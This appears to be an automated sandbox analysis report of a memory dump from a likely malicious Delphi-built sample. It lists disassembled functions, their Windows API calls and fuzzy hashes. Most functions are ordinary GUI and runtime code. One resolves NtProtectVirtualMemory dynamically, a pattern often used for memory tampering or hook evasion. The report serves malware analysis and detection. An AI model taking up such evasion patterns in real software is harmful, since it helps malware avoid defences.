Opcode Fuzzy Hash: e162fbab7d511354293cb40899661c7c51ffbef0cfcd9572b87e74d86ff7d628
Instruction Fuzzy Hash: C5111F75A042047BDB50DBA9DC41F9EB7FDEF88710F51C464BA18E7280D67499009B64

Uniqueness

Uniqueness Score: -1.00%

Function 029F3BF8 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 029F3C11
SelectObject.GDI32(00000000,00000000), ref: 029F3C1A
GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,029F6197,?,?,?,?,029F4D0F), ref: 029F3C2E
SelectObject.GDI32(00000000,00000000), ref: 029F3C3A
DeleteDC.GDI32(00000000), ref: 029F3C40
CreatePalette.GDI32 ref: 029F3C87

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
String ID:
API String ID: 2515223848-0
Opcode ID: 375d48eb9e31519ac8834c5a97fa253e779463fef4c636cabd9599be4da00ed0
Instruction ID: d5d7e42cba77ee7c6fd0db8cd1bac699a388ce81e58e18844d6e60de54a3b63c
Opcode Fuzzy Hash: 375d48eb9e31519ac8834c5a97fa253e779463fef4c636cabd9599be4da00ed0
Instruction Fuzzy Hash: 3401B56120834062D694B77AEC42B6F72BD9FC0714F04C85DBEC987281E77DC885D76A

Uniqueness

Uniqueness Score: -1.00%

Function 029F32E0 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 029F2AA8: CreateBrushIndirect.GDI32(?), ref: 029F2B53

UnrealizeObject.GDI32(00000000), ref: 029F32EC
SelectObject.GDI32(?,00000000), ref: 029F32FE
SetBkColor.GDI32(?,00000000), ref: 029F3321
SetBkMode.GDI32(?,00000002), ref: 029F332C
SetBkColor.GDI32(?,00000000), ref: 029F3347
SetBkMode.GDI32(?,00000001), ref: 029F3352

Part of subcall function 029F1CEC: GetSysColor.USER32(?), ref: 029F1CF6

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: b936ff3cfe8b0aad2d347385d28b58bdd603c5ecf80da84ec6aa700f880e543c
Instruction ID: 482c4b9f08ba87cd9fbb404f9c38cfedbe4e24ead562e8ae163aef753363e5f3
Opcode Fuzzy Hash: b936ff3cfe8b0aad2d347385d28b58bdd603c5ecf80da84ec6aa700f880e543c
Instruction Fuzzy Hash: B3F09CB5A002409BDF80FFBDEDC5E0B7BAEAF843167048490BA08DF196CA65D8109F31

Uniqueness

Uniqueness Score: -1.00%

Function 029D36D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029D36F2
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029D3741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029D3725
RegCloseKey.ADVAPI32(?,029D3748,00000000,?,00000004,00000000,029D3741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029D373B

Strings

FPUMaskValue, xrefs: 029D371C
SOFTWARE\Borland\Delphi\RTL, xrefs: 029D36E8

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: db6798b52460b9825ba5e5f0612fabfe9acfa68bc3b7e17f6cf90e28c5bdc40c
Instruction ID: 08fcd9cdaf6dae6bbebcc40bd99f1730c3bb4a7ff1ec1f443d4dbd7570b076d2
Opcode Fuzzy Hash: db6798b52460b9825ba5e5f0612fabfe9acfa68bc3b7e17f6cf90e28c5bdc40c
Instruction Fuzzy Hash: 7E01F5B5940318B9EB11DB90DC41BFD73ECDB49B01F1080A1BA04D25C0E6759510EF59

Uniqueness

Uniqueness Score: -1.00%

Function 02A1BB38 Relevance: 7.7, APIs: 5, Instructions: 181COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000000,00000060,00000000), ref: 02A1BC0B
MulDiv.KERNEL32(?,00000000,00000000), ref: 02A1BC9A
MulDiv.KERNEL32(?,00000000,00000000), ref: 02A1BCC9
MulDiv.KERNEL32(?,00000000,00000000), ref: 02A1BCF8
MulDiv.KERNEL32(?,00000000,00000000), ref: 02A1BD1B

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81c1028f03c3e38a957afb5379dfdff5ddc4b9579ca2172530aa26ccaf255d6
Instruction ID: 9c10b91f30afdf24d1428b147773f8ab14305de90e755546950164344f7b91cc
Opcode Fuzzy Hash: e81c1028f03c3e38a957afb5379dfdff5ddc4b9579ca2172530aa26ccaf255d6
Instruction Fuzzy Hash: 5781B534A04248EFDB44DB98D688EAEB7F9AF48314F2545E5E408DB362CB74AE41DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02A1D6DC Relevance: 7.7, APIs: 5, Instructions: 174windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 02A1D800
SetMenu.USER32(00000000,00000000), ref: 02A1D81D
SetMenu.USER32(00000000,00000000), ref: 02A1D852
SetMenu.USER32(00000000,00000000), ref: 02A1D86E

Part of subcall function 029D669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 029D66CE

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 02A1D8B5

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Menu$LoadStringWindow
String ID:
API String ID: 1738039741-0
Opcode ID: 59243dc728898b2730f065c48ce3d9baba3be9cf249c92d523643f2aab2bdfb1
Instruction ID: 89eed4fad4ba2476dec8dca470e8d2256848df7f4822cfc1e0ae7a43d971f247
Opcode Fuzzy Hash: 59243dc728898b2730f065c48ce3d9baba3be9cf249c92d523643f2aab2bdfb1
Instruction Fuzzy Hash: 9B51B230B44B408BDB25AF78C9C879A77A6AF40728F0444B6EC49EB296DF74D845CF50

Uniqueness

Uniqueness Score: -1.00%

Function 029FFF30 Relevance: 7.7, APIs: 5, Instructions: 168COMMON

Download Yara Rule

APIs

DrawEdge.USER32(00000000,?,00000006,00000002), ref: 029FFFFF
OffsetRect.USER32(?,00000001,00000001), ref: 02A00050
DrawTextA.USER32(00000000,00000000,?,?,?), ref: 02A00089
OffsetRect.USER32(?,000000FF,000000FF), ref: 02A00096
DrawTextA.USER32(00000000,00000000,?,?,?), ref: 02A00101

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Draw$OffsetRectText$Edge
String ID:
API String ID: 3610532707-0
Opcode ID: c3e0f5f79bf8a8b9993a6fdc0a099055cab7c110db86c9de982d7d9954ce2513
Instruction ID: a5a845227a6574919535cc69fb225d0a3b287e022097d6e8b551559c886005ed
Opcode Fuzzy Hash: c3e0f5f79bf8a8b9993a6fdc0a099055cab7c110db86c9de982d7d9954ce2513
Instruction Fuzzy Hash: ED519571E04204AFDBA1EFA8D9C0B9EB7BAAF45320F1545A5FD14A7390C734EE449B50

Uniqueness

Uniqueness Score: -1.00%

Function 02A07B40 Relevance: 7.6, APIs: 5, Instructions: 139threadCOMMON

Download Yara Rule

APIs

Part of subcall function 02A07F88: WindowFromPoint.USER32(-000000F7,?,00000000,02A07B5A,?,-00000010,?), ref: 02A07F8E
Part of subcall function 02A07F88: GetParent.USER32(00000000), ref: 02A07FA5

GetWindow.USER32(00000000,00000004), ref: 02A07B62
GetCurrentThreadId.KERNEL32 ref: 02A07C36
EnumThreadWindows.USER32(00000000,02A07AD4,?), ref: 02A07C3C
GetWindowRect.USER32(00000000,?), ref: 02A07C53
IntersectRect.USER32(?,?,?), ref: 02A07CC1

Part of subcall function 02A06FC8: GetWindowThreadProcessId.USER32(?), ref: 02A06FD5
Part of subcall function 02A06FC8: GetCurrentProcessId.KERNEL32(?,00000000,?,02A03C39,?,02A02CF5), ref: 02A06FDE
Part of subcall function 02A06FC8: GlobalFindAtomA.KERNEL32(00000000), ref: 02A06FF3
Part of subcall function 02A06FC8: GetPropA.USER32(?,00000000), ref: 02A0700A

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
String ID:
API String ID: 2202917067-0
Opcode ID: 095b10e546de6d0890b9d7571969942487bdd59d5f1ed4a00499ef219c7bca0a
Instruction ID: 7965fb39e5b8e41a64066033a0371a47833ef421972e9431f06b3b94c0f940c1
Opcode Fuzzy Hash: 095b10e546de6d0890b9d7571969942487bdd59d5f1ed4a00499ef219c7bca0a
Instruction Fuzzy Hash: 04512835A002099FDB10DFA8E9C4AAEB7F5AB49354F1485A1E915EB381DB34ED41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A0F8F4 Relevance: 7.6, APIs: 5, Instructions: 126COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?), ref: 02A0F91F
SaveDC.GDI32(00000000), ref: 02A0F958
ExcludeClipRect.GDI32(00000000,?,?,?,?,00000000,02A0FA16,?,00000000), ref: 02A0F9DA
RestoreDC.GDI32(00000000,?), ref: 02A0FA10
EndPaint.USER32(00000000,?,02A0FA5A), ref: 02A0FA4D

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: 0a978484d0280357432a2a7321b01bdff0eb89a423d2a28f5a6c3a5e1867f38e
Instruction ID: 0319ee049ebb23c5d5d96419ab965353ec896f03c53344224ad36a5866217f61
Opcode Fuzzy Hash: 0a978484d0280357432a2a7321b01bdff0eb89a423d2a28f5a6c3a5e1867f38e
Instruction Fuzzy Hash: 96416D70A04248AFDB24DBA8E9D5FAEBBF5BF48704F1544A8E505E76A1CF749D01CB10

Uniqueness

Uniqueness Score: -1.00%

Function 029FFD70 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 826f94112c91c6305e8a542af0afd69e72956993fdaea8de8d93ef7aa4725bad
Instruction ID: 875d59a8942af8552a8c21f53a5911c4ba02187372fa3dd84a61ce83141cb976
Opcode Fuzzy Hash: 826f94112c91c6305e8a542af0afd69e72956993fdaea8de8d93ef7aa4725bad
Instruction Fuzzy Hash: BA1106327003099ADBE0BEB9D808B9B368E8F80744F405015BF05DB7C3EB24C80A8B94

Uniqueness

Uniqueness Score: -1.00%

Function 029F614C Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 029F61A2
GetDeviceCaps.GDI32(00000000,0000000C), ref: 029F61B7
GetDeviceCaps.GDI32(00000000,0000000E), ref: 029F61C1
CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,029F4D0F,00000000,029F4D9B), ref: 029F61E5
ReleaseDC.USER32(00000000,00000000), ref: 029F61F0

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CapsDevice$CreateHalftonePaletteRelease
String ID:
API String ID: 2404249990-0
Opcode ID: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
Instruction ID: 72df093281ad7548cc0fad7705d1a543fe059359d56235541ef34a4635c0c1fb
Opcode Fuzzy Hash: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
Instruction Fuzzy Hash: C311B631B013A96EDBE0EF7998407EE3BDEAF81355F040125FE209B181D7B4A894C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 02A20E38 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 02A20E6C
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 02A20E9E
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,02A1E59C), ref: 02A20ED7
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 02A20EF0
RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,02A1E59C), ref: 02A20F06

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Window$Long$AttributesLayeredRedraw
String ID:
API String ID: 1758778077-0
Opcode ID: 876a32d34b61ef3fc644da844200d5630ac2d1b706d7f7ace5c1e683c7b4ab3f
Instruction ID: 7ab54e1ab725b9bab4e6a46d45c25645c37c5b1ab8e8f7543635c01538d07aa1
Opcode Fuzzy Hash: 876a32d34b61ef3fc644da844200d5630ac2d1b706d7f7ace5c1e683c7b4ab3f
Instruction Fuzzy Hash: 2211A961A442A016CF11ABBC4CC4BD5669E1B45329F084DB3BE9AEE1C6CF68C948CF60

Uniqueness

Uniqueness Score: -1.00%

Function 029F3B60 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 029F3B78
GetDeviceCaps.GDI32(?,00000068), ref: 029F3B94
GetPaletteEntries.GDI32(04080DCD,00000000,00000008,?), ref: 029F3BAC
GetPaletteEntries.GDI32(04080DCD,00000008,00000008,?), ref: 029F3BC4
ReleaseDC.USER32(00000000,?), ref: 029F3BE0

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: EntriesPalette$CapsDeviceRelease
String ID:
API String ID: 3128150645-0
Opcode ID: a19673dba3e49b2a11d43001a5efd00211ecb011018ced68e45aa07101f6a4cf
Instruction ID: 60d86fdb700f3ac8d494f65acfb87197118e0160037564b5ea8d3bb4d8bdd24c
Opcode Fuzzy Hash: a19673dba3e49b2a11d43001a5efd00211ecb011018ced68e45aa07101f6a4cf
Instruction Fuzzy Hash: 3211043168C3446EFB80DAA8AC45F6D77EDE785700F00C4DAF6189A1C0DB76A444CB24

Uniqueness

Uniqueness Score: -1.00%

Function 029DBB50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,029DBBE7,?,?,00000000), ref: 029DBB68

Part of subcall function 029DB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029DB8E2

GetThreadLocale.KERNEL32(00000000,00000004,00000000,029DBBE7,?,?,00000000), ref: 029DBB98
EnumCalendarInfoA.KERNEL32(Function_0000BA9C,00000000,00000000,00000004), ref: 029DBBA3
GetThreadLocale.KERNEL32(00000000,00000003,00000000,029DBBE7,?,?,00000000), ref: 029DBBC1
EnumCalendarInfoA.KERNEL32(Function_0000BAD8,00000000,00000000,00000003), ref: 029DBBCC

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 6debd82a1bee8736ad669205e9f9d87f7e9a7a174d285fbaeee406fcae34ca6e
Instruction ID: 67524f0a18c5a54df011dbe8b0acdb7d220178c8f2f0855229a083eda87be09b
Opcode Fuzzy Hash: 6debd82a1bee8736ad669205e9f9d87f7e9a7a174d285fbaeee406fcae34ca6e
Instruction Fuzzy Hash: 4B01F2306042046BFA01BAA49C22F6A369DDBC5B18F52C564F401EA6C4EB389E00AA68

Uniqueness

Uniqueness Score: -1.00%

Function 02A22570 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 02A2257F
SetEvent.KERNEL32(00000000,02A24D8A), ref: 02A2259A
GetCurrentThreadId.KERNEL32 ref: 02A2259F
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,02A24D8A), ref: 02A225B4
CloseHandle.KERNEL32(00000000,00000000,02A24D8A), ref: 02A225BF

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
String ID:
API String ID: 2429646606-0
Opcode ID: 65d62f340251dd513803e68908f02b60bda17e3c53ffa07985fbf0cb3b346da0
Instruction ID: 3d9b98c55c7199815a1fb35e6674c95ec73cb3d669e9c3965aca4c67a7ef2b88
Opcode Fuzzy Hash: 65d62f340251dd513803e68908f02b60bda17e3c53ffa07985fbf0cb3b346da0
Instruction Fuzzy Hash: 68F09271980610DFC724EFB8E8ACA1533B9E744309B048D14E614E2182DF38E06ADF11

Uniqueness

Uniqueness Score: -1.00%

Function 029DBC00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,029DBDD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 029DBC2F

Part of subcall function 029DB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029DB8E2

Strings

eeee, xrefs: 029DBD3E
yyyy, xrefs: 029DBD25
ggg, xrefs: 029DBD15

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: f6df42962e79865ec57e3ebca3142624a19ce3273413564cc8db668307ce9e56
Instruction ID: f8a63895708608e51e0451beeef0babcfd7bd6192673051bb6dc7be19b6b953d
Opcode Fuzzy Hash: f6df42962e79865ec57e3ebca3142624a19ce3273413564cc8db668307ce9e56
Instruction Fuzzy Hash: 284121A47042068BD701AA7988B03BFB2EBEFD130CB16D825D4A1D7344DF34E906BA65

Uniqueness

Uniqueness Score: -1.00%

Function 02A03498 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 02A034E6
SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 02A03538
DrawMenuBar.USER32(00000000), ref: 02A03545

Strings

P, xrefs: 02A034D8

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: P
API String ID: 3227129158-3110715001
Opcode ID: 25e155820d97939aa176c06464480172646aa8c2e6a6e4bd455af692eb787eaf
Instruction ID: b547f3a3cee32ab338eb046e832cf0aefb47c10778b9d4d1829b891887b19fbf
Opcode Fuzzy Hash: 25e155820d97939aa176c06464480172646aa8c2e6a6e4bd455af692eb787eaf
Instruction Fuzzy Hash: F31191706452006FD750DB28DCC4B5E7BDAAB84358F14C6A8F094CB2E4DB79D849CB86

Uniqueness

Uniqueness Score: -1.00%

Function 029EFC14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 029EFC21
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 029EFC27

Strings

NtProtectVirtualMemory, xrefs: 029EFC17
C:\Windows\System32\ntdll.dll, xrefs: 029EFC1C

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
API String ID: 1646373207-1386159242
Opcode ID: 085f09d6276ddcdf9f260a8222c467d74a9d87bd1605b4734314338d52468b32
Instruction ID: f806be326345709b5266dc9f5a0c5406f42b43be6caff9b2b8a5903cafa88e88
Opcode Fuzzy Hash: 085f09d6276ddcdf9f260a8222c467d74a9d87bd1605b4734314338d52468b32
Instruction Fuzzy Hash: F0E0B6B6644208AF9B40EF98E885D8B37ECAB5CB107408405FA1AD7201C735E8619B70

Uniqueness

Uniqueness Score: -1.00%

Function 029DD6A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02A3910B,00000000,02A3911E), ref: 029DD6A6
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 029DD6B7

Strings

GetDiskFreeSpaceExA, xrefs: 029DD6B1
kernel32.dll, xrefs: 029DD6A1

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 6c63063e2e5eee8dfafdc881bbc342563f692dbc7f028f79ea7fde62c3ce29f9
Instruction ID: 8029db120679b005fa6c27e0ab1d317c1be8fa7d22f7dcac73d7e0f11d4a802f
